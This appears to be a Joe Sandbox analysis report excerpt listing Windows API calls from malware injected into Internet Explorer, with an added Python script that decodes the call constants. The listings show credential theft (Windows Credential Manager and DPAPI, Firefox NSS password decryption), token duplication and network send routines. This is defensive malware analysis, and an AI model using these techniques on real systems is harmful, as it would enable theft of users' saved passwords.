      • Instruction ID: e9c08e2084f956f679686fe47279315408086037cddc2bf93d32c38874aaf0e7
      • Opcode Fuzzy Hash: fdfc14c4d668d62d54afa6d8f8228686440c9709866ed924660886e48608d666
      • Instruction Fuzzy Hash: E101D8B1204742DAF7713B3DEC40B36FAADEB81268F5041B6EC058A1B0DEB4BC418270
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • send.WS2_32(?,?,?,00000000), ref: 04B43AD2
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: send
      • String ID:
      • API String ID: 2809346765-0
      • Opcode ID: 3b605217ca0376cfb8e2dff32c2e52fa591f0f6a68092000d73b8083cd176a88
      • Instruction ID: 5811fccc8c0243268df2e553da03158652b82b695994e47b6eccc1625bd4ac6b
      • Opcode Fuzzy Hash: 3b605217ca0376cfb8e2dff32c2e52fa591f0f6a68092000d73b8083cd176a88
      • Instruction Fuzzy Hash: 12F090323841147FDB008969DC81EAE3BDDEBC96B0F28426AF914CA1C0E2B1A941A760
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • socket.WS2_32(00000002,00000002,00000011), ref: 04B438F4
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: socket
      • String ID:
      • API String ID: 98920635-0
      • Opcode ID: 42dc3353e985cc5e5898b6e5d5a220500866a37bb1dcdeddaee338a85ee94cca
      • Instruction ID: f459a5fc3e6397a56e26c7cda85ecb62c1a19db4ecb42c3b024cece2523e7d1d
      • Opcode Fuzzy Hash: 42dc3353e985cc5e5898b6e5d5a220500866a37bb1dcdeddaee338a85ee94cca
      • Instruction Fuzzy Hash: 1AE04F31350326BBD3305D688C0BB91B6D49B45B71F28977AAAA2951C1E2B158D1A650
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • CreateThread.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 04B458EB
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: CreateThread
      • String ID:
      • API String ID: 2422867632-0
      • Opcode ID: bbf0a39991566964e973179c39b9cc047d6015feb27405042717c3122f9aa73f
      • Instruction ID: fe0570b3a3922b7697dc049c086581efa0fc624aa9db7300755501bd2c7dc037
      • Opcode Fuzzy Hash: bbf0a39991566964e973179c39b9cc047d6015feb27405042717c3122f9aa73f
      • Instruction Fuzzy Hash: 0AE08632204305BFE7644E68DC01B9677DCEB08761F10442AB685C5190EAB1A450EB60
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • HeapCreate.KERNELBASE(00000000,00001000,00000000,04B5BCAD,04B76C58,00000008,04B5BE51,?,?,?,04B76C78,0000000C,04B5BF0C,?), ref: 04B5E951
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: CreateHeap
      • String ID:
      • API String ID: 10892065-0
      • Opcode ID: bdb15791b3c192eef97cacfa72fbf94c8c08123de8c564d15c398c2f11f47fca
      • Instruction ID: 66030004052949b07954810121d26e1317b15bd5fd605962985701018e7f79bf
      • Opcode Fuzzy Hash: bdb15791b3c192eef97cacfa72fbf94c8c08123de8c564d15c398c2f11f47fca
      • Instruction Fuzzy Hash: E7C09BB434574357EB544B395D167552594970C752F50402B7307DA5D0DBF46C505A34
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?,?,?), ref: 04B4F95C
      • Wow64DisableWow64FsRedirection.KERNEL32(?,?,?,00000000), ref: 04B4F97F
      • CreateProcessAsUserW.ADVAPI32(?,?,00000000,00000000,00000000,00000000,00000430,?,00000000,?,?), ref: 04B4F9A0
      • GetLastError.KERNEL32 ref: 04B4F9A6
      • Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 04B4F9AF
      • CloseHandle.KERNEL32(?,?,?), ref: 04B4F9C3
      • CloseHandle.KERNEL32(?,?,?), ref: 04B4F9CD
      • CloseHandle.KERNEL32(?,?,?), ref: 04B4F9E4
      • CloseHandle.KERNEL32(?,?,?), ref: 04B4F9EE
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: CloseHandleWow64$Redirection$CreateDisableDuplicateErrorLastProcessRevertTokenUser
      • String ID: winsta0\default
      • API String ID: 1999317843-3985675287
      • Opcode ID: 6f2ba527be6ced2f50c19daa16828a665b305a7f8fbb5c9627ec7cfc5b2aea1e
      • Instruction ID: 33bf030541a9506f7890c1157081ef849efecf1131ea295411bb026a6e057375
      • Opcode Fuzzy Hash: 6f2ba527be6ced2f50c19daa16828a665b305a7f8fbb5c9627ec7cfc5b2aea1e
      • Instruction Fuzzy Hash: 5E31D672D0025DBBEF119FE5CC84DEEBBBDFB84348B1040AAE611A2120D7349A15EB60
      Uniqueness

      Uniqueness Score: -1.00%
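
Reading these listings means translating the raw stack values the IDA plugin prints (0000FFFF/00001006, 8004667E, 00000430, 0000001A, 02000000, ...) back into Win32 names. The following Python is an added example for this page, not Joe Sandbox or sample code: it parses the bullet format of the APIs lists above, including the "Part of subcall function" lines, and decodes the constants seen in the setsockopt/getsockopt/ioctlsocket/shutdown/socket, Sleep, SHGetSpecialFolderPathW, DuplicateTokenEx, CreateProcessAsUserW and CreateMutexW entries. The constant tables are the author's mapping from the Windows SDK headers; the sample lines are copied from this page.

```python
import re

# Constructed sample: API lines copied from the listings on this page.
SAMPLE_LINES = """\
• setsockopt.WS2_32(00000000,0000FFFF,00001006,00004E20,00000004), ref: 04B5762E
• setsockopt.WS2_32(00000000,00000006,00000001,?,00000001), ref: 04B57646
  • Part of subcall function 04B43AE9: shutdown.WS2_32(00000000,00000002), ref: 04B43AFC
• ioctlsocket.WS2_32(?,8004667E,00000000), ref: 04B43A2E
• getsockopt.WS2_32(?,0000FFFF,00001007,00000000,?), ref: 04B43A01
• socket.WS2_32(00000002,00000002,00000011), ref: 04B438F4
• Sleep.KERNELBASE(00001388), ref: 04B575CA
• SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000001), ref: 04B486E1
• DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?,?,?), ref: 04B4F95C
• CreateProcessAsUserW.ADVAPI32(?,?,00000000,00000000,00000000,00000000,00000430,?,00000000,?,?), ref: 04B4F9A0
• CreateMutexW.KERNELBASE(00000000,00000000,vv11287GD), ref: 04B519C6
• GetLastError.KERNEL32 ref: 04B519CC
"""

# One "APIs" line: bullet, optional "Part of subcall function X:" prefix,
# Name.MODULE, optional (args), then the call-site address after "ref:".
API_LINE = re.compile(r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
                      r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")

# Raw stack values as the plugin prints them, mapped to Windows SDK names (author's table).
SOCKOPT = {(0xFFFF, 0x1005): "SOL_SOCKET/SO_RCVTIMEO", (0xFFFF, 0x1006): "SOL_SOCKET/SO_SNDTIMEO",
           (0xFFFF, 0x1007): "SOL_SOCKET/SO_ERROR", (6, 1): "IPPROTO_TCP/TCP_NODELAY"}
IOCTL, SHUTDOWN = {0x8004667E: "FIONBIO"}, {0: "SD_RECEIVE", 1: "SD_SEND", 2: "SD_BOTH"}
AF, SOCK = {2: "AF_INET", 23: "AF_INET6"}, {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}
PROTO = {0: "default", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}
CSIDL = {0x02: "CSIDL_PROGRAMS", 0x07: "CSIDL_STARTUP", 0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA"}
CREATE_FLAGS = {0x4: "CREATE_SUSPENDED", 0x10: "CREATE_NEW_CONSOLE", 0x20: "NORMAL_PRIORITY_CLASS",
                0x400: "CREATE_UNICODE_ENVIRONMENT", 0x8000000: "CREATE_NO_WINDOW"}
IMPERSONATION = {0: "SecurityAnonymous", 1: "SecurityIdentification",
                 2: "SecurityImpersonation", 3: "SecurityDelegation"}
TOKEN_TYPE = {1: "TokenPrimary", 2: "TokenImpersonation"}


def _arg(tok):
    """'?' -> None (value unknown to the plugin); 8 hex digits -> int; else a literal string."""
    tok = tok.strip()
    if tok == "?":
        return None
    return int(tok, 16) if re.fullmatch(r"[0-9A-F]{8}", tok) else tok


def _hx(v):
    return "?" if v is None else (f"0x{v:X}" if isinstance(v, int) else str(v))


def _flags(value, table):
    """Split a bitmask into known flag names; any unknown remainder is kept as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    rest = value & ~sum(table)
    return "|".join(names + ([_hx(rest)] if rest else [])) or "0"


def parse_report(text):
    """Return one dict per recognised API line; lines in any other format are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [_arg(t) for t in m["args"].split(",")] if m["args"] is not None else []
        calls.append({"api": m["api"], "module": m["module"], "args": args,
                      "ref": m["ref"], "subcall_of": m["sub"]})
    return calls


def describe(call):
    """Decode the raw constants of one call into Win32/Winsock names; '' when nothing is known."""
    api, a = call["api"], call["args"]
    if api in ("setsockopt", "getsockopt") and len(a) >= 4:
        name = SOCKOPT.get((a[1], a[2]), f"level {_hx(a[1])}/opt {_hx(a[2])}")
        if api == "setsockopt" and a[2] in (0x1005, 0x1006) and isinstance(a[3], int):
            return f"{name} (value {_hx(a[3])} = {a[3]} ms)"   # Winsock timeouts are DWORD ms
        return name
    if api == "ioctlsocket" and len(a) >= 3:
        mode = {0: "blocking", None: "mode unknown"}.get(a[2], "non-blocking")
        return f"{IOCTL.get(a[1], _hx(a[1]))} -> {mode}"
    if api == "shutdown" and len(a) >= 2:
        return SHUTDOWN.get(a[1], _hx(a[1]))
    if api == "socket" and len(a) >= 3:
        return f"{AF.get(a[0], _hx(a[0]))}, {SOCK.get(a[1], _hx(a[1]))}, {PROTO.get(a[2], _hx(a[2]))}"
    if api == "Sleep" and a and isinstance(a[0], int):
        return f"{a[0]} ms"
    if api == "SHGetSpecialFolderPathW" and len(a) >= 4:
        return f"{CSIDL.get(a[2], _hx(a[2]))}, fCreate={_hx(a[3])}"
    if api == "DuplicateTokenEx" and len(a) >= 5:
        access = "MAXIMUM_ALLOWED" if a[1] == 0x02000000 else _hx(a[1])
        return f"access={access}, {IMPERSONATION.get(a[3], _hx(a[3]))}, {TOKEN_TYPE.get(a[4], _hx(a[4]))}"
    if api == "CreateProcessAsUserW" and len(a) >= 7 and isinstance(a[6], int):
        return "dwCreationFlags=" + _flags(a[6], CREATE_FLAGS)
    if api == "CreateMutexW" and len(a) >= 3 and isinstance(a[2], str):
        return f"named mutex '{a[2]}'"
    return ""


def annotate(text):
    """'<ref> <api>: <decoded>' per call, so a report excerpt can be read at a glance."""
    return [f"{c['ref']} {c['api']}: {describe(c) or '(no decoding)'}" for c in parse_report(text)]


if __name__ == "__main__":
    print("\n".join(annotate(SAMPLE_LINES)))
```

Decoding the DuplicateTokenEx/CreateProcessAsUserW pair this way makes the "launch a process as a different user" signature concrete: a primary token duplicated with MAXIMUM_ALLOWED at SecurityIdentification level, a process created with CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT on the winsta0\default desktop named in the strings, and Wow64DisableWow64FsRedirection/Wow64RevertWow64FsRedirection bracketing the call so the 32-bit payload resolves the native System32 path. A "?" in the listing is a value the plugin could not recover statically, so the decoder reports it as unknown rather than guessing.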

      APIs
      • CredEnumerateA.ADVAPI32(00000000,00000000,?,?), ref: 04B4BA53
      • GetACP.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 04B4BB33
      • WideCharToMultiByte.KERNEL32(00000000), ref: 04B4BB3A
      • CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000000,?), ref: 04B4BB6F
      • GetACP.KERNEL32(00000000,?,?,?,00000104,00000000,00000000), ref: 04B4BB94
      • WideCharToMultiByte.KERNEL32(00000000), ref: 04B4BB9B
      • CredFree.ADVAPI32(?), ref: 04B4BC05
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: ByteCharCredMultiWide$CryptDataEnumerateFreeUnprotect
      • String ID: J
      • API String ID: 893111784-1141589763
      • Opcode ID: dceb17305d514938c385a4b3435dabd8d5ea7779688174fb8f9fd14f68ee7994
      • Instruction ID: 2804cc5479fdd5c5c84837b37de672c8f0e801949ec28c8e8e91a5fa242cb6f0
      • Opcode Fuzzy Hash: dceb17305d514938c385a4b3435dabd8d5ea7779688174fb8f9fd14f68ee7994
      • Instruction Fuzzy Hash: 72610E71905228AFDF61DFA8CC88E9ABBB8FF48344F1041D6E50997221D635EE95DF20
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 04B4BC41
      • RtlAllocateHeap.NTDLL(00000000), ref: 04B4BC4A
      • GetProcessHeap.KERNEL32(00000008,?), ref: 04B4BC78
      • RtlAllocateHeap.NTDLL(00000000), ref: 04B4BC7B
      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04B4BC9C
      • HeapFree.KERNEL32(00000000), ref: 04B4BC9F
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Heap$Process$Allocate$Free
      • String ID:
      • API String ID: 1005905338-0
      • Opcode ID: b9043c88302088aa9a8752316bc0ec16875efecc17cd3a42d63572b422746d6c
      • Instruction ID: dcdeb1abddab32730a97022a25a8cc91546f611b6d1aad2292683a838da474cc
      • Opcode Fuzzy Hash: b9043c88302088aa9a8752316bc0ec16875efecc17cd3a42d63572b422746d6c
      • Instruction Fuzzy Hash: 46114C70500604BFEB109FB9DC89F6B7BE8EF49254F004459FA59CB290DA75EC008B70
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,04B684CE,?,04B5CDC1,?,000000BC,?,00000001,00000000,00000000), ref: 04B67ED0
      • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,04B684CE,?,04B5CDC1,?,000000BC,?,00000001,00000000,00000000), ref: 04B67EF9
      • GetACP.KERNEL32(?,?,04B684CE,?,04B5CDC1,?,000000BC,?,00000001,00000000), ref: 04B67F0D
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: InfoLocale
      • String ID: ACP$OCP
      • API String ID: 2299586839-711371036
      • Opcode ID: 1512fd4a6d3459fc22b24a11f3c214ed9be630b30e9a495451e40dd69873fd5a
      • Instruction ID: c01458cfcd1e08039fa80441d4e13cbbd78a29bffab40a185f7371caf1a6d148
      • Opcode Fuzzy Hash: 1512fd4a6d3459fc22b24a11f3c214ed9be630b30e9a495451e40dd69873fd5a
      • Instruction Fuzzy Hash: 4201843160124BBBEB21DB64EC05F9AB7ACEF0135DF2008D9E506E14C1EF68EE459A64
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • IsDebuggerPresent.KERNEL32 ref: 04B5EA6C
      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 04B5EA81
      • UnhandledExceptionFilter.KERNEL32(04B731B8), ref: 04B5EA8C
      • GetCurrentProcess.KERNEL32(C0000409), ref: 04B5EAA8
      • TerminateProcess.KERNEL32(00000000), ref: 04B5EAAF
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
      • String ID:
      • API String ID: 2579439406-0
      • Opcode ID: 1085a50ac19711fe3f87b9921478d513be39d169b2b4f873460070a3c27b4d55
      • Instruction ID: f645146b802d55b510d09aee905c84578c606f00bfa343763e68d3c823cbbd88
      • Opcode Fuzzy Hash: 1085a50ac19711fe3f87b9921478d513be39d169b2b4f873460070a3c27b4d55
      • Instruction Fuzzy Hash: 2721CAB6905204DFDB40DF29E244758BFB4FB08314F50405BE90A87381EBB86D888F31
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 04B64E05
        • Part of subcall function 04B5C6E9: Sleep.KERNEL32(00000000), ref: 04B5C711
      • GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 04B64EE2
      • GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 04B64F02
      • GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000002,?,?,00000000), ref: 04B64F3E
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: InfoLocale$ErrorLastSleep
      • String ID:
      • API String ID: 1708069870-0
      • Opcode ID: b2ab4fb9187a0fbd9d77814d2ff67781439bd7371fc50ab36af0626bbf12e908
      • Instruction ID: 4171acab937b3769f54a88f09f7a9d496fb7b26b0f190b28b031005e0a5dfed3
      • Opcode Fuzzy Hash: b2ab4fb9187a0fbd9d77814d2ff67781439bd7371fc50ab36af0626bbf12e908
      • Instruction Fuzzy Hash: 1D41D671900616AFEF25AF659D40BAB7BB9FF04324F1048E9FC06D2190EB39AD509F64
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • SetCurrentDirectoryA.KERNEL32(?), ref: 04B4BD05
      • LoadLibraryA.KERNEL32(00000000), ref: 04B4BD12
      • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 04B4BD2E
      • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 04B4BD3B
      • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 04B4BD48
      • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 04B4BD55
      • GetProcAddress.KERNEL32(00000000,NSSBase64_DecodeBuffer), ref: 04B4BD62
      • GetProcAddress.KERNEL32(00000000,PK11_CheckUserPassword), ref: 04B4BD6F
      • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 04B4BD7C
      • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 04B4BD89
      • GetProcAddress.KERNEL32(00000000,sqlite3_step), ref: 04B4BD96
      • GetProcAddress.KERNEL32(00000000,sqlite3_column_text), ref: 04B4BDA3
      • GetProcAddress.KERNEL32(00000000,sqlite3_open), ref: 04B4BDB0
      • GetProcAddress.KERNEL32(00000000,sqlite3_finalize), ref: 04B4BDBD
      • GetProcAddress.KERNEL32(00000000,sqlite3_column_count), ref: 04B4BDCA
      • GetProcAddress.KERNEL32(00000000,sqlite3_prepare_v2), ref: 04B4BDD7
      • GetProcAddress.KERNEL32(00000000,sqlite3_close), ref: 04B4BDE4
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: AddressProc$CurrentDirectoryLibraryLoad
      • String ID: NSSBase64_DecodeBuffer$NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$\nss3.dll$sqlite3_close$sqlite3_column_count$sqlite3_column_text$sqlite3_finalize$sqlite3_open$sqlite3_prepare_v2$sqlite3_step
      • API String ID: 2324480696-3779156443
      • Opcode ID: 70a2eb6ed3d1c46b82166396a80a1aee0bb7759b0012953c9d110a5b0c09bf44
      • Instruction ID: 6806637c5e2dc0d89eb07ed3724b137214089002dab7782de9cccf0f6e4da1cc
      • Opcode Fuzzy Hash: 70a2eb6ed3d1c46b82166396a80a1aee0bb7759b0012953c9d110a5b0c09bf44
      • Instruction Fuzzy Hash: BA31E371D44319ABC710AFBA9C49D8BBEFCEF51A54B01449BB414E3260DAB8B9809F70
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • socket.WS2_32(00000002,00000001,00000000), ref: 04B50E96
      • socket.WS2_32(00000002,00000001,00000000), ref: 04B50EA1
      • setsockopt.WS2_32 ref: 04B50ED8
      • setsockopt.WS2_32(000000FF,00000006,00000001,00000001,00000001), ref: 04B50EEA
      • htons.WS2_32(?), ref: 04B50F05
      • connect.WS2_32(000000FF,?,00000010), ref: 04B50F27
      • closesocket.WS2_32(000000FF), ref: 04B50F3A
      • closesocket.WS2_32(000000FF), ref: 04B50F49
      • Sleep.KERNEL32(00000001), ref: 04B50F51
      • send.WS2_32 ref: 04B50F7E
      • select.WS2_32 ref: 04B50FC1
      • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 04B50FD6
      • Sleep.KERNEL32(00000001,00000000,00000001), ref: 04B50FE1
      • recv.WS2_32(00000000,?,00005000,00000000), ref: 04B50FF6
      • closesocket.WS2_32(00000000), ref: 04B5100F
      • closesocket.WS2_32(?), ref: 04B51022
      • gethostbyname.WS2_32(?), ref: 04B51033
      • Sleep.KERNEL32(00000001), ref: 04B51041
      • htons.WS2_32(00000000), ref: 04B51062
      • connect.WS2_32(?,?,00000010), ref: 04B51088
      • send.WS2_32(?,?,?,00000000), ref: 04B510A4
      • Sleep.KERNEL32(00000001), ref: 04B510BB
      • CreateThread.KERNEL32(00000000,00000000,Function_00010A67,00000000,00000000,?), ref: 04B510F9
      • TerminateThread.KERNEL32(00000000,00000000), ref: 04B51108
      • Sleep.KERNEL32(000003E8), ref: 04B51113
      • socket.WS2_32(00000002,00000001,00000000), ref: 04B51121
      • socket.WS2_32(00000002,00000001,00000000), ref: 04B5112C
      • closesocket.WS2_32(000000FF), ref: 04B51145
      • closesocket.WS2_32(?), ref: 04B51154
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: closesocket$Sleep$socket$Threadconnecthtonssendsetsockopt$CreateTerminategethostbynamerecvselect
      • String ID:
      • API String ID: 1817470008-0
      • Opcode ID: 875010776ac362f47f325fb87c5b783839ede3c1ff90fb04e42d41b7679f7586
      • Instruction ID: 734536ee304551d2349acb49ea334841848804ba7799a61123e49a4cc0732cc2
      • Opcode Fuzzy Hash: 875010776ac362f47f325fb87c5b783839ede3c1ff90fb04e42d41b7679f7586
      • Instruction Fuzzy Hash: 66917174900B04AFEB309F68CC89B9AB7B4EF08711F100695FA59E76E1D770AD858F64
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 04B5EAB7: RtlEncodePointer.NTDLL(00000000), ref: 04B5EAB9
      • LoadLibraryW.KERNEL32(USER32.DLL,04B9D1F0,00000314,00000000), ref: 04B69D0A
      • GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 04B69D26
      • RtlEncodePointer.NTDLL(00000000), ref: 04B69D37
      • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 04B69D44
      • RtlEncodePointer.NTDLL(00000000), ref: 04B69D47
      • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 04B69D54
      • RtlEncodePointer.NTDLL(00000000), ref: 04B69D57
      • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 04B69D64
      • RtlEncodePointer.NTDLL(00000000), ref: 04B69D67
      • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 04B69D78
      • RtlEncodePointer.NTDLL(00000000), ref: 04B69D7B
      • RtlDecodePointer.NTDLL(04B9DB00), ref: 04B69D9D
      • RtlDecodePointer.NTDLL ref: 04B69DA7
      • RtlDecodePointer.NTDLL(?), ref: 04B69DE6
      • RtlDecodePointer.NTDLL(?), ref: 04B69E00
      • RtlDecodePointer.NTDLL(04B9D1F0), ref: 04B69E14
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Pointer$Encode$AddressDecodeProc$LibraryLoad
      • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
      • API String ID: 1951731885-564504941
      • Opcode ID: f749c6e904ce74a6f6cdc0912092eeb3d9071441bc9b8d3dfe8fea2fcf4c1bcb
      • Instruction ID: 7c77b8f45f30c9fd1912fd2fba0a8e0b6a05638d36f721bd9f54f3024d8d72d5
      • Opcode Fuzzy Hash: f749c6e904ce74a6f6cdc0912092eeb3d9071441bc9b8d3dfe8fea2fcf4c1bcb
      • Instruction Fuzzy Hash: 35415EB1D0130AABDF109BBA9D85E6F7BA8EB48344B1408AAE505E3154DB7CED15CB70
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,04B5BCBD,04B76C58,00000008,04B5BE51,?,?,?,04B76C78,0000000C,04B5BF0C,?), ref: 04B5EE63
      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 04B5EE85
      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 04B5EE92
      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 04B5EE9F
      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 04B5EEAC
      • TlsAlloc.KERNEL32(?,?,04B5BCBD,04B76C58,00000008,04B5BE51,?,?,?,04B76C78,0000000C,04B5BF0C,?), ref: 04B5EEFC
      • TlsSetValue.KERNEL32(00000000,?,?,04B5BCBD,04B76C58,00000008,04B5BE51,?,?,?,04B76C78,0000000C,04B5BF0C,?), ref: 04B5EF17
      • RtlEncodePointer.NTDLL ref: 04B5EF32
      • RtlEncodePointer.NTDLL ref: 04B5EF3F
      • RtlEncodePointer.NTDLL ref: 04B5EF4C
      • RtlEncodePointer.NTDLL ref: 04B5EF59
      • RtlDecodePointer.NTDLL(Function_0001ECBE), ref: 04B5EF7A
      • RtlDecodePointer.NTDLL(00000000), ref: 04B5EFA9
      • GetCurrentThreadId.KERNEL32 ref: 04B5EFBB
        • Part of subcall function 04B5EB3A: RtlDecodePointer.NTDLL(00000005), ref: 04B5EB4B
        • Part of subcall function 04B5EB3A: TlsFree.KERNEL32(00000020,04B5BD80,04B5BD66,04B76C58,00000008,04B5BE51,?,?,?,04B76C78,0000000C,04B5BF0C,?), ref: 04B5EB65
        • Part of subcall function 04B5EB3A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 04B65C13
        • Part of subcall function 04B5EB3A: RtlDeleteCriticalSection.NTDLL(00000020), ref: 04B65C3D
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue
      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
      • API String ID: 4111557884-3819984048
      • Opcode ID: b0668bab368c4e200064b02e7767868526ab5758234e58dd9c897ce96954c901
      • Instruction ID: eea676e8b379735e990eae2ea8873b97477752df3b331b369793bf71b1ac7bbf
      • Opcode Fuzzy Hash: b0668bab368c4e200064b02e7767868526ab5758234e58dd9c897ce96954c901
      • Instruction Fuzzy Hash: BD3141329043219EEB11AF7AAA046157FA9EB45354B14096BEC14D32B0DF38EE20DF70
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetCurrentProcess.KERNEL32(?,00000000), ref: 04B5165A
